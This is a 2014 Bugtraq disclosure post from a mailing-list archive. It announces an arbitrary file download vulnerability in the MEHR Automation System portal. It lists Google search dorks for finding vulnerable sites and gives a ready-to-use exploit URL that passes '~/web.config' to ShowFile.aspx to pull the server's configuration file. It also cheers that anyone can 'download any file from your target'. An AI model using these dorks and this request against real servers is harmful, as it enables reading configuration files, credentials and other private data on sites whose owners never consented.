'MEHR Automation System Arbitrary File Download Vulnerability(persian portal)'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    MEHR Automation System Arbitrary File Download Vulnerability(persian portal)
From:       cseye_ut () yahoo ! com
Date:       2014-08-25 16:43:07
Message-ID: 201408251643.s7PGh7ux024474 () sf01web3 ! securityfocus ! com
[Download RAW message or body]

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : MEHR Automation System Arbitrary File Download Vulnerability(persian \
portal) # Author : alieye
# vendor : http://shakhesrayane.ir/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
#
# Google Dork: 
# intext:"Poshtibani@ShakhesRayane.ir"
# intext:"Shakhes Rayane Sepahan"
# www.google.com/search?q=%22%D8%B3%DB%8C%D8%B3%D8%AA%D9%85+%D8%A7%D8%AA%D9%88%D9%85%D \
8%A7%D8%B3%DB%8C%D9%88%D9%86+%D8%A7%D8%AF%D8%A7%D8%B1%DB%8C+%D9%85%D9%87%D8%B1+%D8%AF%D8%A7%D9%86%D8%B4%22
 #
# Version: all version
# Date: 25/08/2014
# os : windows server 2008
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++



You can download any file from your target ;)


Exploit : http://victim.com/ShowFile.aspx?File=~/web.config

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all \
cseye members [#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic